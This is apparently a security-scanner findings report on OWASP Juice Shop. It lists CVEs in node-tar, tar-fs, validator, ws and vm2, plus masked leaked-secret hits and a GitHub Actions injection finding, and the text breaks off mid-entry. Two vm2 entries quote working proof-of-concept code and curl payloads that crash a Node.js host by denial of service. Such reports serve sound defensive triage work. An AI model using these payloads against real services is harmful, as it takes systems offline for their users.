Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.3

+

node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) +fails to sanitize the linkpath of Link (hardlink) and SymbolicLink +entries when preservePaths is false (the default secure behavior). This +allows malicious archives to bypass the extraction root restriction, +leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning +via absolute symlink targets. This vulnerability is fixed in 7.5.3.

+ + +
Mitigation
+

7.5.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23745
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
+https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
+https://nvd.nist.gov/vuln/detail/CVE-2026-23745
+https://www.cve.org/CVERecord?id=CVE-2026-23745

+ + + + + + + +
+
+
+
+ Finding 212: CVE-2026-23950 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 176 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.4

+

node-tar,a Tar for Node.js, has a race condition vulnerability in +versions up to and including 7.5.3. This is due to an incomplete +handling of Unicode path collisions in the path-reservations + system. On case-insensitive or normalization-insensitive filesystems +(such as macOS APFS, In which it has been tested), the library fails to +lock colliding paths (e.g., ß and ss), +allowing them to be processed in parallel. This bypasses the library's +internal concurrency safeguards and permits Symlink Poisoning attacks +via race conditions. The library uses a PathReservations +system to ensure that metadata checks and file operations for the same +path are serialized. This prevents race conditions where one entry might + clobber another concurrently. This is a Race Condition which enables +Arbitrary File Overwrite. This vulnerability affects users and systems +using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss + are different), conflicting paths do not have their order properly +preserved under filesystems that ignore Unicode normalization (e.g., +APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en'). As a workaround, users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

+ + +
Mitigation
+

7.5.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23950
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6
+https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w
+https://nvd.nist.gov/vuln/detail/CVE-2026-23950
+https://www.cve.org/CVERecord?id=CVE-2026-23950

+ + + + + + + +
+
+
+
+ Finding 213: CVE-2026-24842 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.7

+

node-tar,a Tar for Node.js, contains a vulnerability in versions +prior to 7.5.7 where the security check for hardlink entries uses +different path resolution semantics than the actual hardlink creation +logic. This mismatch allows an attacker to craft a malicious TAR archive + that bypasses path traversal protections and creates hardlinks to +arbitrary files outside the extraction directory. Version 7.5.7 contains + a fix for the issue.

+ + +
Mitigation
+

7.5.7

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24842
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46
+https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v
+https://nvd.nist.gov/vuln/detail/CVE-2026-24842
+https://www.cve.org/CVERecord?id=CVE-2026-24842

+ + + + + + + +
+
+
+
+ Finding 214: CVE-2026-26960 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

+ + +
Description
+

node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.8

+

node-tar is a full-featured Tar for Node.js. When using default +options in versions 7.5.7 and below, an attacker-controlled archive can +create a hardlink inside the extraction directory that points to a file +outside the extraction root, enabling arbitrary file read and write as +the extracting user. Severity is high because the primitive bypasses +path protections and turns archive extraction into a direct filesystem +access primitive. This issue has been fixed in version 7.5.8.

+ + +
Mitigation
+

7.5.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-26960
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384
+https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx
+https://nvd.nist.gov/vuln/detail/CVE-2026-26960
+https://www.cve.org/CVERecord?id=CVE-2026-26960

+ + + + + + + +
+
+
+
+ Finding 215: CVE-2026-29786 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: hardlink path traversal via drive-relative linkpath
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.10

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, + tar can be tricked into creating a hardlink that points outside the +extraction directory by using a drive-relative link target such as +C:../target.txt, which enables file overwrite outside cwd during normal +tar.x() extraction. This issue has been patched in version 7.5.10.

+ + +
Mitigation
+

7.5.10

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-29786
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96
+https://nvd.nist.gov/vuln/detail/CVE-2026-29786
+https://www.cve.org/CVERecord?id=CVE-2026-29786

+ + + + + + + +
+
+
+
+ Finding 216: CVE-2026-31802 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar7.4.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

tar: tar: File overwrite via drive-relative symlink traversal
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.11

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, + tar (npm) can be tricked into creating a symlink that points outside +the extraction directory by using a drive-relative symlink target such +as C:../../../target.txt, which enables file overwrite outside cwd +during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.

+ + +
Mitigation
+

7.5.11

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31802
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad
+https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256
+https://nvd.nist.gov/vuln/detail/CVE-2026-31802
+https://www.cve.org/CVERecord?id=CVE-2026-31802

+ + + + + + + +
+
+
+
+ Finding 217: CVE-2025-59343 Tar-Fs 2.1.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar-fs2.1.3
+ + + + + + + +
File Path
juice-shop/node_modules/tar-fs/package.json
+
+
+
+ + + + + +
Description
+

tar-fs: tar-fs symlink validation bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.1.1, 2.1.4, 1.16.6

+

tar-fs provides filesystem bindings for tar-stream. Versions prior to + 3.1.1, 2.1.3, and 1.16.5 are vulnerable to symlink validation bypass if + the destination directory is predictable with a specific tarball. This +issue has been patched in version 3.1.1, 2.1.4, and 1.16.6. A workaround + involves using the ignore option on non files/directories.

+ + +
Mitigation
+

3.1.1, 2.1.4, 1.16.6

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-59343
+https://github.com/mafintosh/tar-fs
+https://github.com/mafintosh/tar-fs/commit/0bd54cdf06da2b7b5b95cd4b062c9f4e0a8c4e09
+https://github.com/mafintosh/tar-fs/security/advisories/GHSA-vj76-c3g6-qr5v
+https://lists.debian.org/debian-lts-announce/2025/09/msg00028.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-59343
+https://www.cve.org/CVERecord?id=CVE-2025-59343

+ + + + + + + +
+
+
+
+ Finding 218: CVE-2025-12758 Validator 13.15.15 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 792 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
validator13.15.15
+ + + + + + + +
File Path
juice-shop/node_modules/validator/package.json
+
+
+
+ + + + + +
Description
+

Validator is Vulnerable to Incomplete Filtering of One or More Instances of Special Elements
+Target: Node.js
+Type: node-pkg
+Fixed version: 13.15.22

+

Versions of the package validator before 13.15.22 are vulnerable to +Incomplete Filtering of One or More Instances of Special Elements in the + isLength() function that does not take into account Unicode variation +selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to +improper string length calculation. This can lead to an application +using isLength for input validation accepting strings significantly +longer than intended, resulting in issues like data truncation in +databases, buffer overflows in other system components, or +denial-of-service.

+ + +
Mitigation
+

13.15.22

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://seclists.org/fulldisclosure/2026/Jan/27
+https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e
+https://github.com/validatorjs/validator.js
+https://github.com/validatorjs/validator.js/commit/d457ecaf55b0f3d8bd379d82757425d0d13dd382
+https://github.com/validatorjs/validator.js/pull/2616
+https://nvd.nist.gov/vuln/detail/CVE-2025-12758
+https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476

+ + + + + + + +
+
+
+
+ Finding 234: CVE-2026-44001 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

+ + +
Description
+

vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

A sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed +code to crash the host Node.js process via a single Promise constructor +that triggers an unhandled rejection propagating to the host. The fix +for CVE-2026-22709 (v3.10.2) only sanitized the onRejected callback in .then() and .catch() overrides and did not address the executor-to-unhandledRejection path.

+

Details

+

When sandboxed code creates a Promise whose executor sets Error.name to a Symbol() and then accesses .stack, V8's internal FormatStackTrace (C++) attempts Symbol.toString(), which throws a host-realm TypeError. Because this error originates inside the Promise executor and no .catch() handler is attached, it becomes an unhandled rejection that propagates to the host process.

+
    +
  • lib/setup-sandbox.js:38localPromise wraps the native Promise constructor but does not wrap the executor in try-catch.
  • +
  • lib/setup-sandbox.js:165-230resetPromiseSpecies and the .then()/.catch() overrides sanitize the onRejected callback chains, but do not intercept unhandled rejections originating from the executor itself.
  • +
+

The CVE-2026-22709 patch (v3.10.2) sanitized .then() and .catch() callback chains but left the executor-to-unhandledRejection path completely open.

+

Root Cause: Promise executor errors are not +caught/sanitized before they can propagate as unhandled rejections to +the host process, causing an immediate process crash.

+

allowAsync: false does not help: This setting only blocks async/await syntax and overrides .then()/.catch() to throw. The Promise constructor itself is still callable. Worse, because .catch() is blocked, any rejection from the executor is guaranteed to be unhandled — making allowAsync: false paradoxically more dangerous than true for this vulnerability.

+

PoC

+

Library-level PoC (Node.js script — primary):

+
const { VM } = require("vm2");
+
+// Works with ANY allowAsync setting — both true and false
+const vm = new VM({ timeout: 5000, allowAsync: false });
+
+try {
+  const result = vm.run(`
+    new Promise(function(r, j) {
+      var e = new Error();
+      e.name = Symbol();
+      e.stack;
+    });
+  `);
+  console.log("Result:", result);   // Reaches here (returns Promise object)
+} catch (err) {
+  console.log("Caught:", err);       // Never executed
+}
+
+console.log("After try-catch");      // Also prints normally
+
+// But on the next microtask tick:
+// [UnhandledPromiseRejection: TypeError: Cannot convert a Symbol value to a string]
+// Exit code: 1
+//
+// try-catch cannot help — vm.run() returns synchronously,
+// the rejection fires asynchronously outside any catch scope.
+//
+// NOTE: allowAsync: false only blocks async/await syntax and
+// .then()/.catch() method calls. The Promise constructor itself
+// still executes, and the unhandled rejection still propagates.
+// In fact, allowAsync: false makes it WORSE — .catch() is blocked,
+// so the rejection is guaranteed to be unhandled.
+
+ +

HTTP demonstration (web service impact):

+
# 1. Confirm server is running
+curl -s http://localhost:3000/api/execute \
+  -X POST -H "Content-Type: application/json" \
+  -d '{"code":"\"alive\""}'
+# => {"output":[],"errors":[],"result":"\"alive\"","executionTime":1}
+
+# 2. Send payload — server process will crash
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"new Promise(function(r,j){var e=new Error();e.name=Symbol();e.stack})"}'
+
+# 3. Server is dead (connection refused until restart)
+curl -s http://localhost:3000/  # => connection refused
+
+ +

Impact

+
    +
  • DoS: A single request crashes the entire host +Node.js process. All concurrent users lose service immediately. In +Node.js 15+, unhandled rejections terminate the process by default — no +special configuration is required for the crash to occur.
  • +
  • Persistent DoS despite restart policies: Even when +container orchestration (Docker restart policy, Kubernetes liveness +probes, PM2, etc.) automatically restarts the crashed process, an +attacker can send repeated requests to crash the process again before it + fully recovers. In our testing, a single curl request caused the Docker container to restart (confirmed via StartedAt timestamp change), and sending the next request immediately after restart triggered another crash. This creates a continuous denial-of-service loop + where the service never becomes available to legitimate users — each +restart is met with another crash before any real request can be served.
  • +
  • Amplification: A single HTTP request (~150 bytes) +terminates the entire host process serving all users. The cost to the +attacker is negligible compared to the impact.
  • +
  • Scope: All applications using vm2, regardless of allowAsync setting. allowAsync: false only blocks async/await syntax and .then()/.catch() method calls — the Promise constructor itself still executes, and the unhandled rejection still propagates. In fact, allowAsync: false makes the vulnerability worse because .catch() is blocked, guaranteeing the rejection is always unhandled.
  • +
+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/advisories/GHSA-99p7-6v5w-7xg8
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh

+ + + + + + + +
+
+
+
+ Finding 235: CVE-2026-44004 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

vm2 Sandbox Access to Host Buffer.alloc Allows timeout Bypass Resulting in Memory Exhaustion
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

Sandboxed code can call Buffer.alloc() with an arbitrary size to allocate memory directly on the host heap. Because Buffer.alloc is a synchronous C++ native call, vm2's timeout option cannot interrupt it. A single request can exhaust host memory and crash the process with a FATAL ERROR: Reached heap limit.

+

Details

+

In lib/vm.js:58, Buffer is exposed to the sandbox through the HOST object. The bridge proxy (lib/bridge.js) passes Buffer.alloc() calls to the host without any size validation.

+

Key technical distinction from regular JavaScript memory exhaustion (e.g., while(true) a.push(...)):
+- JavaScript loops: V8 can interrupt via timeout — vm2's timeout option works
+- Buffer.alloc(N): Executes as a single synchronous C++ call — V8 timeout has no opportunity to interrupt

+

This means:
+1. timeout: 5000 does NOT protect against this attack
+2. A single call allocates the entire requested size at once
+3. In memory-constrained environments (Docker, Lambda, Kubernetes pods), this causes immediate OOM crash

+

Tested amplification factor: ~100 bytes HTTP request — 1,000,000:1 or + greater (100 bytes request to 100MB+ host heap allocation).

+

PoC

+

Library-level PoC (Node.js script — primary):

+
const { VM } = require("vm2");
+const vm = new VM({ timeout: 5000 });
+
+// Buffer.alloc bypasses timeout — allocates 100MB on host heap
+const result = vm.run(`Buffer.alloc(1024*1024*100).length`);
+console.log(result); // 104857600 — timeout had no effect
+
+// Control test — JavaScript loop IS caught by timeout
+try {
+  vm.run(`var a=[]; while(true) a.push(1)`);
+} catch(e) {
+  console.log(e.message); // "Script execution timed out after 5000ms"
+}
+
+ +

HTTP demonstration (OOM crash):

+
# 1. Confirm server is running
+curl -s http://localhost:3000/api/execute \
+  -X POST -H "Content-Type: application/json" \
+  -d '{"code":"\"alive\""}'
+# => {"result":"\"alive\""}
+
+# 2. Send Buffer.alloc payload — process crashes with OOM
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"Buffer.alloc(1024*1024*100).length"}'
+# => empty response (process died)
+
+# 3. Check server logs:
+# FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
+
+# Control test — JavaScript loop IS caught by timeout:
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"var a=[]; while(true) a.push(1)"}'
+# => {"errors":["Script execution timed out after 5000ms"]}
+# Server stays alive — timeout works for JS, but NOT for Buffer.alloc
+
+ +

Impact

+
    +
  • DoS: A single HTTP request crashes the host Node.js process via OOM. The timeout option provides no protection.
  • +
  • Environment-dependent severity:
  • +
  • Memory-constrained environments (Docker with memory + limits, Kubernetes pods, Lambda): The allocation exceeds the memory +limit, causing immediate process termination via OOM. This is the +primary threat scenario — FATAL ERROR: Reached heap limit was confirmed in testing.
  • +
  • Unconstrained environments: The allocation succeeds + and memory is reclaimed by GC after the request completes, resulting in + temporary performance degradation rather than a crash.
  • +
  • Scope: All applications using vm2. Default +configuration is vulnerable. Memory-constrained environments (Docker, +Kubernetes, Lambda) are most severely impacted.
  • +
+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7

+ + + + + + + +
+
+
+
+ Finding 241: CVE-2024-37890 Ws 7.4.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
ws7.4.6
+ + + + + + + +
File Path
juice-shop/node_modules/engine.io/node_modules/ws/package.json
+
+
+
+ + + + + +
Description
+

nodejs-ws: denial of service when handling a request with many HTTP headers
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.2.4, 6.2.3, 7.5.10, 8.17.1

+

ws is an open source WebSocket client and server for Node.js. A +request with a number of headers exceeding theserver.maxHeadersCount +threshold could be used to crash a ws server. The vulnerability was +fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), +ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of +ws, the issue can be mitigated in the following ways: 1. Reduce the +maximum allowed length of the request headers using the +--max-http-header-size=size and/or the maxHeaderSize options so that no +more headers than the server.maxHeadersCount limit can be sent. 2. Set +server.maxHeadersCount to 0 so that no limit is applied.

+ + +
Mitigation
+

5.2.4, 6.2.3, 7.5.10, 8.17.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-37890
+https://github.com/websockets/ws
+https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f
+https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e
+https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c
+https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63
+https://github.com/websockets/ws/issues/2230
+https://github.com/websockets/ws/pull/2231
+https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q
+https://nodejs.org/api/http.html#servermaxheaderscount
+https://nvd.nist.gov/vuln/detail/CVE-2024-37890
+https://www.cve.org/CVERecord?id=CVE-2024-37890

+ + + + + + + +
+
+
+
+ Finding 242: Secret Detected in /juice-shop/build/lib/insecurity.js - Asymmetric Private Key + + + + secret + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
47
+ + + + + + + +
File Path
/juice-shop/build/lib/insecurity.js
+
+
+
+ + + + + +
Description
+

Asymmetric Private Key
+Category: AsymmetricPrivateKey
+Match: ----BEGIN RSA PRIVATE KEY-----**********************************************************************************************************************-----END RSA PRIVATE

+ + + + + + + + + + + + + + + + + + +
+
+
+
+ Finding 1: yaml.github-actions.security.run-shell-injection.run-shell-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 78 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
21
+ + + + + + + +
File Path
/src/.github/workflows/update-challenges-ebook.yml
+
+
+
+ + + + + +
Description
+

Result message: Using variable interpolation ${{...}} with github context data in a run: step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. github + context data can have arbitrary user input and should be treated as +untrusted. Instead, use an intermediate environment variable with env: to store the data and use the environment variable in the run: script. Be sure to use double-quotes the environment variable, like this: "$ENVVAR".

+ + + + + + + + + + + + +
References
+

https:// +docs.github.com/en/actions/learn-github-actions/security-hardening-for- +github-actions#understanding-the-risk-of-script-injections
+https://securitylab.github.com/research/github-actions-untrusted-input/

+ + + + + + + +

Medium

+ +
+
+
+
+ Finding 243: Secret Detected in /juice-shop/frontend/src/app/app.guard.spec.ts - JWT Token + + + + secret + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
38
+ + + + + + + +
File Path
/juice-shop/frontend/src/app/app.guard.spec.ts
+
+
+
+ + + + + +
Description
+

JWT token
+Category: JWT
+Match: ocalStorage.setItem('token', '***********************')

+ + + + + + + + + + + + + + + + + + +
+
+
+
+ Finding 236: CVE-2023-32313 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 74 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

vm2: Inspect Manipulation
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.9.18

+

vm2 is a sandbox that can run untrusted code with Node's built-in +modules. In versions 3.9.17 and lower of vm2 it was possible to get a +read-write reference to the node inspect method and edit options for console.log. As a result a threat actor can edit options for the console.log command. This vulnerability was patched in the release of version 3.9.18 of vm2. Users are advised to upgrade. Users unable to upgrade may make the inspect method readonly with vm.readonly(inspect) after creating a vm.

+ + +
Mitigation
+

3.9.18

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-32313
+https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238
+https://github.com/patriksimek/vm2/releases/tag/3.9.18
+https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v
+https://nvd.nist.gov/vuln/detail/CVE-2023-32313
+https://www.cve.org/CVERecord?id=CVE-2023-32313

+ + + + + + + +
+
+
+
+ Finding 178: CVE-2021-23771 Notevil 1.3.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
notevil1.3.3
+ + + + + + + +
File Path
juice-shop/node_modules/notevil/package.json
+
+
+
+ + + + +
CVSS v3
+

